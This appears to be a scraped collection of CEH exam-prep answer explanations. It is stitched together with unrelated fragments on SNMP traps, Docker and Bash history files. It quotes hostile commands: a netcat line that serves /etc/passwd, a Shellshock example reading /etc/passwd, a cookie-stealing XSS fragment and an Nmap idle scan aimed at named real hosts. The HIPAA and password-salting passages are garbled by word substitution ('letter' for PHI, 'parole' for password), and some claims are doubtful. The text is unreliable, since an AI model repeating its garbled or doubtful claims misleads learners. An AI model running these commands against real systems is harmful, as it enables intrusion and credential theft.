A keylogger is a type of spyware that can record and steal consecutive keystrokes (and much more) that the user enters on a device. Keyloggers are a common tool for cybercriminals, who use them to capture passwords, credit card numbers, personal information, and other sensitive data. Keyloggers can be installed on a device through various methods, such as phishing emails, malicious downloads, or physical access. To confirm the type of program, the security team can use a web search tool, such as Bing, to look for keylogger programs and compare their features and behaviors with the suspicious program they encountered. Alternatively, they can use a malware analysis tool, such as Malwarebytes, to scan and identify the program and its characteristics.

To prevent the same attack from occurring in the future, the security team should employ intrusion detection systems (IDS) and regularly update the system software. An IDS is a system that monitors network traffic and system activities for signs of malicious or unauthorized behavior, such as keylogger installation or communication. An IDS can alert the security team of any potential threats and help them respond accordingly. Regularly updating the system software can help patch any vulnerabilities or bugs that keyloggers may exploit to infect the device. Additionally, the security team should also remove the keylogger program from the affected computers and change any compromised passwords or credentials. References:

Keylogger | What is a Keylogger? How to protect yourself

How to Detect and Remove a Keylogger From Your Computer

Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS)

What is a Keylogger? | Keystroke Logging Definition | Avast

Keylogger Software: 11 Best Free to Use in 2023

Comprehensive and Detailed Explanation:

Script Kiddies are individuals with minimal technical skills who use existing tools or scripts developed by others to perform attacks. They generally do not understand the underlying mechanisms and rely on publicly available hacking tools.

From CEH v13 Official Study Guide:

Module 1: Introduction to Ethical Hacking → Hacker Types

“Script kiddies are unskilled attackers who use tools created by others.”

A brute force attack is a method of trying different combinations of passwords or keys to gain access to a system or service. It is not a reliable way of detecting a honeypot, as it may trigger an alert or response from the target. Moreover, a brute force attack does not provide any information about the system’s characteristics or behavior that could indicate a honeypot. A honeypot is a decoy system that is designed to attract and trap attackers, while providing security teams with valuable intelligence and insights. Therefore, an ethical hacker needs to use more subtle and stealthy techniques to detect and avoid honeypots.

The other options are valid techniques for detecting a honeypot. Probing system services and observing the three-way handshake can reveal anomalies or inconsistencies in the system’s responses, such as abnormal banners, ports, or protocols. Using honeypot detection tools like Send-Safe Honeypot Hunter can scan the target network and identify potential honeypots based on various criteria, such as IP address, domain name, or open ports. Analyzing the MAC address can detect instances running on VMware, which is a common platform for deploying honeypots. A honeypot running on VMware will have a MAC address that starts with 00:0C:29, 00:50:56, or 00:05:69. References:

What is a Honeypot? Types, Benefits, Risks and Best Practices

Using Honeypots for Network Intrusion Detection

Detecting Honeypot Access With Varonis

Command Breakdown:

nc: Netcat utility

-l: Listen mode

-u: Use UDP protocol

-p 55555: Listen on port 55555

< /etc/passwd: Redirects the contents of /etc/passwd into the socket

This means that when a connection is made to UDP port 55555, the contents of /etc/passwd will be sent to the connecting host.

From CEH v13 Courseware:

Module 8: Sniffing & Network Communication Tools

CEH v13 Study Guide states:

“Netcat can be used to serve files, open shells, or transfer data. Using input redirection, it can stream file contents to anyone who connects.”

Incorrect Options:

A: Does not log; it outputs /etc/passwd

C: The opposite; it serves the file, doesn’t grab it

D: Netcat does not delete files with this syntax

The sequence of actions that would provide the most comprehensive information about the network’s status is to use Hping3 for an ICMP ping scan on the entire subnet, then use Nmap for a SYN scan on identified active hosts, and finally use Metasploit to exploit identified vulnerabilities. This sequence of actions works as follows:

Use Hping3 for an ICMP ping scan on the entire subnet: This action is used to discover the active hosts on the network by sending ICMP echo request packets to each possible IP address on the subnet and waiting for ICMP echo reply packets from the hosts. Hping3 is a command-line tool that can craft and send custom packets, such as TCP, UDP, or ICMP, and analyze the responses. By using Hping3 for an ICMP ping scan, the hacker can quickly and efficiently identify the live hosts on the network, as well as their response times and packet loss rates12.

Use Nmap for a SYN scan on identified active hosts: This action is used to scan the open ports and services on the active hosts by sending TCP SYN packets to a range of ports and analyzing the TCP responses. Nmap is a popular and powerful tool that can perform various types of network scans, such as port scanning, service detection, OS detection, and vulnerability scanning. By using Nmap for a SYN scan, the hacker can determine the state of the ports on the active hosts, such as open, closed, filtered, or unfiltered, as well as the services and protocols running on them. A SYN scan is also known as a stealth scan, as it does not complete the TCP three-way handshake and thus avoids logging on the target system34.

Use Metasploit to exploit identified vulnerabilities: This action is used to exploit the vulnerabilities on the active hosts by using pre-built or custom modules that leverage the open ports and services. Metasploit is a framework that contains a collection of tools and modules for penetration testing and exploitation. By using Metasploit, the hacker can launch various attacks on the active hosts, such as remote code execution, privilege escalation, or backdoor installation, and gain access to the target system or data. Metasploit can also be used to perform post-exploitation tasks, such as gathering information, maintaining persistence, or pivoting to other systems .

The other options are not as comprehensive as option B for the following reasons:

A. Initiate with Nmap for a ping sweep, then use Metasploit to scan for open ports and services, and finally use Hping3 to perform remote OS fingerprinting: This option is not optimal because it does not use the tools in the most efficient and effective way. Nmap can perform a ping sweep, but it is slower and less flexible than Hping3, which can craft and send custom packets. Metasploit can scan for open ports and services, but it is more suitable for exploitation than scanning, and it relies on Nmap for port scanning anyway. Hping3 can perform remote OS fingerprinting, but it is less accurate and reliable than Nmap, which can use various techniques and probes to determine the OS type and version13 .

C. Start with Hping3 for a UDP scan on random ports, then use Nmap for a version detection scan, and finally use Metasploit to exploit detected vulnerabilities: This option is not effective because it does not use the best scanning methods and techniques. Hping3 can perform a UDP scan, but it is slower and less reliable than a TCP scan, as UDP is a connectionless protocol that does not always generate responses. Scanning random ports is also inefficient and incomplete, as it may miss important ports or services. Nmap can perform a version detection scan, but it is more useful to perform a port scan first, as it can narrow down the scope and speed up the scan. Metasploit can exploit detected vulnerabilities, but it is not clear how the hacker can identify the vulnerabilities without performing a vulnerability scan first13 .

D. Begin with NetScanTools Pro for a general network scan, then use Nmap for OS detection and version detection, and finally perform an SYN flooding with Hping3: This option is not comprehensive because it does not cover all the aspects and objectives of a network scan. NetScanTools Pro is a graphical tool that can perform various network tasks, such as ping, traceroute, DNS lookup, or port scan, but it is less powerful and versatile than Nmap or Hping3, which can perform more advanced and customized scans. Nmap can perform OS detection and version detection, but it is more useful to perform a port scan first, as it can provide more information and insights into the target system. Performing an SYN flooding with Hping3 is not a network scan, but a denial-of-service attack, which can disrupt the network and alert the target system, and it is not an ethical or legal action for a hired hacker13 .

Comprehensive and Detailed Explanation:

In Windows SID structure:

RID 500 = Default Administrator

RID 501 = Guest Account

Therefore, “-501” at the end indicates Matthew is operating as the Guest user, which has very limited privileges. To gain full administrative control, he must escalate his privileges.

From CEH v13 Courseware:

Module 6: System Hacking → Privilege Escalation Techniques

Zone transfers (AXFR) are DNS operations used to replicate DNS data from a primary to a secondary server. If improperly configured, attackers can request these transfers and retrieve valuable DNS information, including hostnames and IPs.

Correct Statements:

A: Zone transfers are DNS protocol operations.

C: They transfer the entire DNS zone file (records for the domain).

E: Zone transfers use TCP port 53. Blocking it can prevent unauthorized transfers.

From CEH v13 Courseware:

Module 3: Scanning Networks

Topic: DNS Enumeration → Zone Transfers

CEH v13 Study Guide states:

“A zone transfer is a mechanism used by DNS servers to replicate databases. It can be used by attackers to retrieve detailed DNS information if not properly restricted. Zone transfers occur over TCP port 53.”

Incorrect Statements:

B/D: nslookup is a query tool; it doesn’t perform or manage zone transfers.

F: Zone transfers can happen on the internet if DNS servers are misconfigured.

Comprehensive and Detailed Explanation:

The OpenSSL command-line utility s_client is used to test SSL/TLS connections.

Correct syntax:

openssl s_client -connect www.website.com:443

This command will initiate a TLS connection to port 443 on the given domain and allow you to inspect certificates, cipher suites, and server responses.

From CEH v13 Courseware:

Module 12: Cryptography → SSL/TLS Testing Tools

https://en.wikipedia.org/wiki/Bluejacking

Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs or laptop computers, sending a vCard which typically contains a message in the name field (i.e., for bluedating or bluechat) to another Bluetooth-enabled device via the OBEX protocol.

Bluejacking is usually harmless, but because bluejacked people generally don't know what has happened, they may think that their phone is malfunctioning. Usually, a bluejacker will only send a text message, but with modern phones it's possible to send images or sounds as well. Bluejacking has been used in guerrilla marketing campaigns to promote advergames.

Bluejacking is also confused with Bluesnarfing, which is the way in which mobile phones are illegally hacked via Bluetooth.

Comprehensive and Detailed Explanation:

A Denial-of-Service (DoS) attack aims to overwhelm a system or service with excessive requests, rendering it unavailable to legitimate users. It targets:

Bandwidth (e.g., flooding with traffic)

Resources (CPU, memory, or disk usage)

Applications (exploiting bugs that crash services)

From CEH v13 Courseware:

Module 9: Denial-of-Service Attacks

Incorrect Options:

B refers to brute-force attacks.

C mischaracterizes password cracking.

D describes impersonation or spoofing, not DoS.

Comprehensive and Detailed Explanation:

Subnet 10.1.4.0/23 includes addresses from:

10.1.4.0 to 10.1.5.255

Total = 512 IPs (510 usable)

Last 100 usable IPs would be:

Start: 10.1.5.155 to 10.1.5.254

Only option C (10.1.5.200) falls within that range.

From CEH v13 Courseware:

Module 3: Subnetting & IP Addressing

We have various articles already in our documentation for setting up SNMPv2 trap handling in Opsview, but SNMPv3 traps are a whole new ballgame. They can be quite confusing and complicated to set up the first time you go through the process, but when you understand what is going on, everything should make more sense.

SNMP has gone through several revisions to improve performance and security (version 1, 2c and 3). By default, it is a UDP port based protocol where communication is based on a ‘fire and forget’ methodology in which network packets are sent to another device, but there is no check for receipt of that packet (versus TCP port when a network packet must be acknowledged by the other end of the communication link). 

There are two modes of operation with SNMP – get requests (or polling) where one device requests information from an SNMP enabled device on a regular basis (normally using UDP port 161), and traps where the SNMP enabled device sends a message to another device when an event occurs (normally using UDP port 162). The latter includes instances such as someone logging on, the device powering up or down, or a wide variety of other problems that would need this type of investigation.

This blog covers SNMPv3 traps, as polling and version 2c traps are covered elsewhere in our documentation.

SNMP traps

Since SNMP is primarily a UDP port based system, traps may be ‘lost’ when sending between devices; the sending device does not wait to see if the receiver got the trap. This means if the configuration on the sending device is wrong (using the wrong receiver IP address or port) or the receiver isn’t listening for traps or rejecting them out of hand due to misconfiguration, the sender will never know.

The SNMP v2c specification introduced the idea of splitting traps into two types; the original ‘hope it gets there’ trap and the newer ‘INFORM’ traps. Upon receipt of an INFORM, the receiver must send an acknowledgement back. If the sender doesn’t get the acknowledgement back, then it knows there is an existing problem and can log it for sysadmins to find when they interrogate the device.

Windows TTL 128, Linux TTL 64, OpenBSD 255 ... https://subinsb.com/default-device-ttl-values/

Time to Live (TTL) represents to number of 'hops' a packet can take before it is considered invalid. For Windows/Windows Phone, this value is 128. This value is 64 for Linux/Android.

Netcat does not support encryption natively. To securely transmit data over the network, the attacker must use a variant like Cryptcat, which adds symmetric encryption to standard netcat functionality.

From CEH v13 Courseware:

Module 8: Sniffing and Secure Communication

CEH v13 Study Guide states:

“Cryptcat is a netcat clone that supports encryption. For secure file transfers or remote shell access, cryptcat is the recommended tool.”

Incorrect Options:

A/B/C: These are invalid or non-existent netcat parameters.

Mar 1, 2016, 7:33:28 AM 10.240.250.23 - 54373 10.249.253.15 - 22 tcp_ip

Let's just disassemble this entry.

Mar 1, 2016, 7:33:28 AM - time of the request

10.240.250.23 - 54373 - client's IP and port

10.249.253.15 - server IP

- 22 - SSH port

Docker uses a client-server design. The docker client talks to the docker daemon, that will the work of building, running, and distributing your docker containers. The docker client and daemon will run on the same system, otherwise you will connect a docker consumer to a remote docker daemon. The docker consumer and daemon communicate using a REST API, over OS sockets or a network interface.

The docker daemon (dockerd) listens for docker API requests and manages docker objects like pictures, containers, networks, and volumes. A daemon may communicate with other daemons to manage docker services.

A digital certificate, issued by a trusted Certificate Authority (CA), binds a public key to the identity of an entity (e.g., user, organization). This provides a means to validate ownership of the public key.

CEH v13 Reference:

Module 17: Cryptography

"A digital certificate ensures the authenticity of the public key through a trusted third party known as a Certificate Authority."

━━━━━━━━━━━━━━━━━━━━━━

Comprehensive and Detailed Explanation:

A covert channel is any communication path that allows data to be transferred in violation of a system’s security policy. It’s commonly used by malware or Trojans to exfiltrate data or send commands undetected.

Examples include:

Encoding data in TCP headers (unused bits)

Timing of packets (timing channel)

Use of legitimate protocols to piggyback malicious traffic

From CEH v13 Courseware:

Module 6: Malware Threats → Trojans and Covert Channels

document.write(); (Cookie and session ID theft)

https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/

As seen in the indicated question, cookies are escaped and sent to script to variable ‘cookie’. If the malicious user would inject this script into the website’s code, then it will be executed in the user’s browser and cookies will be sent to the malicious user.

Comprehensive and Detailed Explanation:

SIEM (Security Information and Event Management) systems aggregate logs and alerts from across the network—servers, routers, firewalls, IDS/IPS, and applications—and correlate that data to identify suspicious or malicious activity.

They provide:

Real-time alerting

Long-term log storage

Compliance reporting

Incident response facilitation

From CEH v13 Courseware:

Module 12: Evading IDS, Firewalls, and Honeypots → SIEM Tools

File created by Bash, a Unix-based shell program commonly used on Mac OS X and Linux operating systems; stores a history of user commands entered at the command prompt; used for viewing old commands that are executed.

BASH_HISTORY files are hidden files with no filename prefix. They always use the filename .bash_history.

NOTE: Bash is that the shell program employed by Apple Terminal.

Our goal is to assist you understand what a file with a *.bash_history suffix is and the way to open it.

The Bash History file type, file format description, and Mac and Linux programs listed on this page are individually researched and verified by the FileInfo team. we attempt for 100% accuracy and only publish information about file formats that we’ve tested and validated.

Once a suitable zombie has been found, performing a scan is easy. Simply specify the zombie hostname to the -sI option and Nmap does the rest. Example 5.19 shows an example of Ereet scanning the Recording Industry Association of America by bouncing an idle scan off an Adobe machine named Kiosk.

Example 5.19. An idle scan against the RIAA

# nmap -Pn -p- -sI kiosk.adobe.com www.riaa.com

Starting Nmap ( http://nmap.org )

Idlescan using zombie kiosk.adobe.com (192.150.13.111:80); Class: Incremental

Nmap scan report for 208.225.90.120

(The 65522 ports scanned but not shown below are in state: closed)

Port       State       Service

21/tcp     open        ftp

25/tcp     open        smtp

80/tcp     open        http

111/tcp    open        sunrpc

135/tcp    open        loc-srv

443/tcp    open        https

1027/tcp   open        IIS

1030/tcp   open        iad1

2306/tcp   open        unknown

5631/tcp   open        pcanywheredata

7937/tcp   open        unknown

7938/tcp   open        unknown

36890/tcp  open        unknown

Nmap done: 1 IP address (1 host up) scanned in 2594.47 seconds

To block NetBIOS and related Windows networking traffic from traversing a firewall (especially from external sources), you should block the following ports:

Port 135 (TCP/UDP): Microsoft RPC endpoint mapper (DCOM/RPC)

Port 139 (TCP): NetBIOS Session Service

Port 445 (TCP): Direct-hosted SMB over TCP/IP (Windows 2000+)

These ports are commonly used for:

File sharing

RPC-based communication

Windows network services

From CEH v13 Official Courseware:

Module 3: Scanning Networks

Module 4: Enumeration

CEH v13 Study Guide states:

“To prevent external enumeration, remote file sharing, and NetBIOS attacks, administrators should block inbound access to ports 135, 139, and 445 on the firewall.”

Incorrect Options:

A (110): POP3 mail service

D (161): SNMP

F (1024): High ephemeral port; not specific to NetBIOS

MX (Mail Exchange) records in DNS define the mail servers responsible for receiving email for a domain. Each MX record has a priority value.

Important concept:

A lower number indicates a higher priority.

Email servers attempt delivery to the mail server with the lowest priority first.

For example:

If MX records are:

10 mail1.example.com

20 mail2.example.com

Then mail1 will be tried first. If it fails, mail2 will be used.

So the statement “MX record priority increases as the number increases” is false.

In CEH v13 Module 16: Cloud Computing and Container Security, Kubernetes components are explained for understanding container orchestration risks.

Kube-scheduler is the master node component responsible for:

Assigning newly created pods to available nodes.

Evaluating each pod’s resource requirements.

Considering node affinity/anti-affinity, data locality, hardware restrictions, etc.

Ensuring workload balancing across nodes.

Other Options:

A. Kube-controller-manager: Manages control loops for replication and status.

C. Kube-apiserver: Acts as the entry point for all REST commands.

D. Etcd: A key-value store used to save configuration data.

PHI stands for Protected Health info. The HIPAA Privacy Rule provides federal protections for private health info held by lined entities and provides patients an array of rights with regard to that info. under HIPAA phi is considered to be any identifiable health info that’s used, maintained, stored, or transmitted by a HIPAA-covered entity – a healthcare provider, health plan or health insurer, or a aid clearinghouse – or a business associate of a HIPAA-covered entity, in relation to the availability of aid or payment for aid services.

It is not only past and current medical info that’s considered letter under HIPAA Rules, however also future info concerning medical conditions or physical and mental health related to the provision of care or payment for care. phi is health info in any kind, together with physical records, electronic records, or spoken info.

Therefore, letter includes health records, medical histories, lab check results, and medical bills. basically, all health info is considered letter once it includes individual identifiers. Demographic info is additionally thought of phi underneath HIPAA Rules, as square measure several common identifiers like patient names, Social Security numbers, Driver’s license numbers, insurance details, and birth dates, once they square measure connected with health info.

The eighteen identifiers that create health info letter are:

Names

Dates, except year

phonephone numbers

Geographic information

FAX numbers

Social Security numbers

Email addresses

case history numbers

Account numbers

Health arrange beneficiary numbers

Certificate/license numbers

Vehicle identifiers and serial numbers together with license plates

Web URLs

Device identifiers and serial numbers

net protocol addresses

Full face photos and comparable pictures

Biometric identifiers (i.e. retinal scan, fingerprints)

Any distinctive identifying variety or code

One or a lot of of those identifiers turns health info into letter, and phi HIPAA Privacy Rule restrictions can then apply that limit uses and disclosures of the data. HIPAA lined entities and their business associates will ought to guarantee applicable technical, physical, and body safeguards are enforced to make sure the confidentiality, integrity, and availability of phi as stipulated within the HIPAA Security Rule.

Passwords are usually delineated as “hashed and salted”. salting is simply the addition of a unique, random string of characters renowned solely to the site to every parole before it’s hashed, typically this “salt” is placed in front of each password.

The salt value needs to be hold on by the site, which means typically sites use the same salt for each parole. This makes it less effective than if individual salts are used.

The use of unique salts means that common passwords shared by multiple users – like “123456” or “password” – aren’t revealed revealed when one such hashed password is known – because despite the passwords being the same the immediately and hashed values are not.

Large salts also protect against certain methods of attack on hashes, including rainbow tables or logs of hashed passwords previously broken.

Both hashing and salting may be repeated more than once to increase the issue in breaking the security.

https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html

Since this question refers specifically to analyzing a wireless network, it is obvious that we need an option with AirPcap (Riverbed AirPcap USB-based adapters capture 802.11 wireless traffic for analysis). Since it works with two traffic analyzers SteelCentral Packet Analyzer (Cascade Pilot) or Wireshark, the correct option would be "Wireshark with Airpcap."

NOTE: AirPcap adapters no longer available for sale effective January 1, 2018, but a question on this topic may occur on your exam.

===========

The Shellshock vulnerability (CVE-2014-6271) allows attackers to execute arbitrary commands via crafted environment variables in Bash. In this example, the malicious command cat /etc/passwd is executed, displaying the contents of the file (which contains system user account info).

Reference – CEH v13 Official Study Guide:

Module 6: Malware Threats

Quote:

“Shellshock allows remote code execution through environment variables processed by Bash. Exploits can be used to run commands like cat /etc/passwd on a vulnerable system.”

Incorrect Options:

A. No file deletion occurs.

B. It doesn’t change passwords.

C. No user addition occurs.

===========

In CEH v13 Module 05: System Hacking, once an attacker gains access to hashed passwords, cracking tools are employed to reverse or brute-force them.

Tool Breakdown:

John the Ripper: A powerful password cracking tool that supports many hash formats.

Hashcat: GPU-based, extremely fast password hash cracking tool.

THC-Hydra: Used for online attacks (e.g., SSH, FTP brute force).

Netcat: Not a password cracking tool — it’s a network utility used for:

Remote shell connections

Banner grabbing

File transfers

Port scanning

Therefore:

C. Netcat is the correct answer — it is not used for password cracking.

https://en.wikipedia.org/wiki/MAC_filtering

MAC filtering is a security method based on access control. Each address is assigned a 48-bit address, which is used to determine whether we can access a network or not. It helps in listing a set of allowed devices that you need on your Wi-Fi and the list of denied devices that you don’t want on your Wi-Fi. It helps in preventing unwanted access to the network. In a way, we can blacklist or white list certain computers based on their MAC address. We can configure the filter to allow connection only to those devices included in the white list. White lists provide greater security than blacklists because the router grants access only to selected devices.

It is used on enterprise wireless networks having multiple access points to prevent clients from communicating with each other. The access point can be configured only to allow clients to talk to the default gateway, but not other wireless clients. It increases the efficiency of access to a network.

The router allows configuring a list of allowed MAC addresses in its web interface, allowing you to choose which devices can connect to your network. The router has several functions designed to improve the network's security, but not all are useful. Media access control may seem advantageous, but there are certain flaws.

On a wireless network, the device with the proper credentials such as SSID and password can authenticate with the router and join the network, which gets an IP address and access to the internet and any shared resources.

MAC address filtering adds an extra layer of security that checks the device’s MAC address against a list of agreed addresses. If the client’s address matches one on the router’s list, access is granted; otherwise, it doesn’t join the network.

In CEH v13 Module 17: Mobile and IoT Security, Spearphone is defined as a privacy-intrusion attack that:

Exploits a smartphone’s speaker output, particularly when loudspeaker mode is used.

Leverages motion sensors (accelerometer, gyroscope) through a malicious app to capture acoustic signals emitted during:

Phone calls

Voice assistant interactions

Media playback

This enables attackers to extract private speech content without needing microphone access.

Option Clarification:

A. Man-in-the-disk: Exploits unprotected external storage in Android.

B. aLTEr: Exploits LTE protocol weaknesses; unrelated to loudspeaker eavesdropping.

C. SIM card attack: Targets SIM-level vulnerabilities (e.g., SIMjacker).

D. Spearphone: Correct — exploits loudspeaker emissions and motion sensors.

Josh is preparing to send the payload (malicious file) to the target, which clearly maps to the Delivery phase of the Cyber Kill Chain.

According to CEH v13 and the Cyber Kill Chain model (developed by Lockheed Martin and used in ethical hacking methodology):

Delivery is the third phase of the kill chain.

It involves transmitting the weaponized payload to the target via phishing emails, USB drops, or malicious links.

In this case, Josh is preparing the email with a spoofed identity and malicious attachment — representing an act of delivery.

Incorrect options:

A. Exploitation occurs after delivery, when the payload is executed.

B. Weaponization is the phase where the malicious file is created (combining exploit with a backdoor or trojan).

D. Reconnaissance involves information gathering, completed earlier in the scenario.

Reference – CEH v13 Official Courseware:

Module 01: Introduction to Ethical Hacking

Section: “Cyber Kill Chain Model”

Table Reference: “Stages of a Cyber Attack”

CEH Engage Lab: “Kill Chain Simulation in Phishing Campaigns”

Jamming and scrambling are attacks targeting the physical layer of the OSI model, often affecting wireless communication by generating interference to disrupt signal transmission. To mitigate such attacks, one advanced countermeasure is the use of Cognitive Radios.

According to CEH v13 Official Courseware:

Cognitive radios are intelligent radio systems capable of sensing the radio frequency (RF) environment and dynamically adjusting their operating parameters (e.g., frequency, modulation) to avoid interference and jamming.

They enable dynamic spectrum access and help in improving spectrum efficiency and resilience against jamming.

This approach falls under physical-layer security mechanisms.

Incorrect Options:

A. gets and strcpy are unsafe functions vulnerable to buffer overflow, not relevant to DoS protection.

B. Allowing all types of packets increases risk and is not a mitigation.

D. TCP SYN cookies protect against SYN flood attacks and disabling them weakens security.

Reference – CEH v13 Official Courseware:

Module 10: Denial-of-Service (DoS) Attacks

Section: “Defensive Strategies Against Jamming and DoS Attacks”

Subsection: “Physical Layer Countermeasures”

===========

Snort is an open-source Network Intrusion Detection and Prevention System (NIDS/NIPS) capable of real-time traffic analysis and packet logging. It functions as a sniffer and can detect various forms of attacks using signature-based rules.

CEH v13 Reference:

Module 10: Evading IDS, Firewalls, and Honeypots

"Snort can operate as a sniffer, logger, or full NIDS capable of real-time traffic analysis."

━━━━━━━━━━━━━━━━━━━━━━

Comprehensive and Detailed Explanation:

Steganography allows someone to hide data (like a spreadsheet or document) within another innocuous-looking file (like an image, video, or audio). This disguises the presence of the data entirely, allowing it to bypass standard data loss prevention (DLP) systems and firewalls, which look for file types and suspicious patterns.

From CEH v13 Courseware:

Module 6: Malware Threats → Steganography and Covert Channels

https://nmap.org/book/man-output.html

-oX - Requests that XML output be directed to the given filename.

Reconnaissance is the first phase of ethical hacking and also part of the cyber kill chain. It involves gathering publicly available information about a target, such as employee names, company structure, and branding, which is later used in social engineering or phishing attacks.

Reference – CEH v13 Official Study Guide:

Module 2: Footprinting and Reconnaissance

Quote:

“Reconnaissance involves gathering information from public sources such as websites, social networks, and press releases. This is used to craft targeted phishing messages or exploit organizational weaknesses.”

Incorrect Options Explained:

A & B. Not formal terms in ethical hacking.

D. Enumeration involves interacting with systems to extract technical data.

In active session hijacking, after identifying a valid session, the attacker must desynchronize the legitimate communication between the client and the server. To do this, Bob should:

Knock one of the parties offline (typically the client).

Then spoof the session by injecting crafted packets using the guessed sequence number.

From CEH v13 Courseware:

Module 11: Session Hijacking

CEH v13 Study Guide states:

“After identifying a session and predicting its sequence number, the attacker forces the original user offline, allowing them to assume control over the connection using spoofed packets.”

Incorrect Options:

A: Taking over the session is the ultimate goal, but the necessary step before that is disconnecting the original participant.

B: Sequence prediction is already done.

C: Sequence number has already been guessed.

Blind SQL Injection is a type of SQL injection attack where no error messages or data are directly returned to the attacker. Instead, the attacker sends specially crafted SQL queries that result in true or false responses. Based on how the application responds (such as redirecting to a different page or loading time), the attacker infers information about the backend database.

According to CEH v13:

Blind SQLi is used when standard SQL injection yields no visible output.

It comes in two forms:

Boolean-based: Infers information based on application behavior.

Time-based: Infers information based on server response time delays.

Incorrect Options:

A. Time-based SQLi is a sub-type of Blind SQLi, but the question describes Boolean-based behavior.

B. Union SQL injection uses the UNION keyword to fetch additional rows; requires visible output.

C. Error-based SQL injection relies on database error messages.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “Types of SQL Injection”

Subsection: “Blind SQL Injection (Boolean and Time-Based)”

===========

There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS flaws: non-persistent and persistent. In this issue, we consider the non-persistent cross-site scripting vulnerability.

The non-persistent (or reflected) cross-site scripting vulnerability is by far the most basic type of web vulnerability. These holes show up when the data provided by a web client, most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content.

Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.

The action that would best protect your web server from potential misconfiguration-based attacks is performing regular server configuration audits. A server configuration audit is a process of reviewing and verifying the security settings and parameters of the server, such as user accounts, permissions, services, ports, protocols, files, directories, logs, and patches. A server configuration audit can help you to identify and fix any security misconfigurations that may expose your server to attacks, such as using default credentials, enabling unnecessary services, leaving open ports, or missing security updates. A server configuration audit can also help you to comply with the security standards and best practices for your server, such as the CIS Benchmarks or the OWASP Secure Configuration Guide12.

The other options are not as effective as option A for the following reasons:

B. Enabling multi-factor authentication for users: This option is not relevant because it does not address the server misconfiguration issue, but the user authentication issue. Multi-factor authentication is a method of verifying the identity of the users by requiring them to provide two or more pieces of evidence, such as a password, a code, or a biometric factor. Multi-factor authentication can enhance the security of the user accounts and prevent unauthorized access, but it does not prevent the server from being attacked due to misconfigured settings or parameters3.

C. Implementing a firewall to filter traffic: This option is not sufficient because it does not prevent the server from being misconfigured, but only limits the exposure of the server to the network. A firewall is a device or software that monitors and controls the incoming and outgoing network traffic based on predefined rules. A firewall can protect the server from external attacks by blocking or allowing certain ports, protocols, or IP addresses. However, a firewall cannot protect the server from internal attacks or from attacks that exploit the allowed traffic. Moreover, a firewall itself can be misconfigured and cause security issues4.

D. Regularly backing up server data: This option is not preventive but reactive, as it does not protect the server from being attacked, but only helps to recover the data in case of an attack. Backing up server data is a process of creating and storing copies of the data on the server, such as files, databases, or configurations. Backing up server data can help you to restore the data in case of data loss, corruption, or deletion due to an attack. However, backing up server data does not prevent the server from being attacked in the first place, and it does not fix the security misconfigurations that may have caused the attack5.

Before implementing auditing, it is crucial to assess how enabling this feature will impact system resources, performance, and storage. Auditing can generate significant logs and place additional load on systems, especially in environments handling sensitive data such as banking.

Understanding the impact helps determine if the current infrastructure can handle the overhead or if optimizations or upgrades are needed beforehand.

Reference – CEH v13 Official Study Guide:

Module 5: System Hacking

Section: Enabling Auditing and Logging

Quote:

“Before enabling auditing, organizations must assess the performance and storage impact. Improper implementation can result in performance degradation or missed logs.”

Incorrect Options Explained:

A. Vulnerability scanning is important but not directly related to audit implementation.

C. Cost-benefit analysis comes after understanding operational impact.

D. Staffing is a planning step, not the first technical action.

===========

From CEH v13 Module 03: Scanning Networks, OS fingerprinting with Nmap (using the -O option) requires privileged access to craft raw packets (especially SYN, ACK, and ICMP). On Unix/Linux systems:

Root privileges are mandatory to perform TCP/IP stack fingerprinting.

If Nmap is run as a normal user, it fails to initiate OS scanning and exits with a message like “QUITTING!”.

So, in this case, the scan fails because the shell opened does not have elevated (root) privileges.

snmp-check (snmp_enum Module) is the best tool to help the ethical hacker to get the information without directly modifying any parameters within the SNMP agent’s MIB. snmp-check is a tool that allows the user to enumerate SNMP devices and extract information from them. It can gather a wide array of information about the target, such as system information, network interfaces, routing tables, ARP cache, installed software, running processes, TCP and UDP services, user accounts, and more. snmp-check can also perform brute force attacks to discover the SNMP community strings, which are the passwords used to access the SNMP agent. snmp-check is available as a standalone tool or as a module (snmp_enum) within the Metasploit framework.

The other options are not as effective or suitable as snmp-check for the ethical hacker’s task. Nmap is a network scanning and enumeration tool that can perform various types of scans and probes on the target. It can also run scripts to perform specific tasks, such as retrieving SNMP information. However, Nmap may not be able to gather as much information as snmp-check, and it may also trigger alerts or blocks from firewalls or intrusion detection systems. Oputils is a network monitoring and management toolset that can perform various functions, such as device discovery, configuration backup, bandwidth monitoring, IP address management, and more. However, Oputils is mainly designed for device management and not SNMP enumeration, and it may not be able to extract valuable network information from the SNMP agent. SnmpWalk is a tool that allows the user to retrieve the entire MIB tree of an SNMP agent by using SNMP GETNEXT requests. However, SnmpWalk is not suitable for the ethical hacker’s task, because it requires the user to change an OID (object identifier) to a different value, which may modify the parameters within the SNMP agent’s MIB and affect its functionality or security. References:

snmp-check - The SNMP enumerator

SNMP Enumeration | Ethical Hacking - GreyCampus

SNMP Enumeration - GeeksforGeeks

Nmap - the Network Mapper - Free Security Scanner

OpUtils - Network Monitoring & Management Toolset

SnmpWalk - SNMP MIB Browser

A sniffer tool is a software or hardware device that can capture and analyze network traffic. In a switched Ethernet environment, where each port on a switch is connected to a single device, a sniffer tool can only see the traffic that is destined for or originated from the device it is attached to. However, an attacker can use various techniques to overcome this limitation and sniff the traffic of other devices on the same network. One of these techniques is MAC flooding, which exploits the finite memory of the switch’s MAC address table. The attacker sends a large number of frames with different source MAC addresses to the switch, which fills up the MAC address table and causes the switch to enter a fail-open mode, where it broadcasts all incoming frames to all ports, regardless of the destination MAC address. This way, the attacker can see all the traffic on the network and capture it with a sniffer tool.

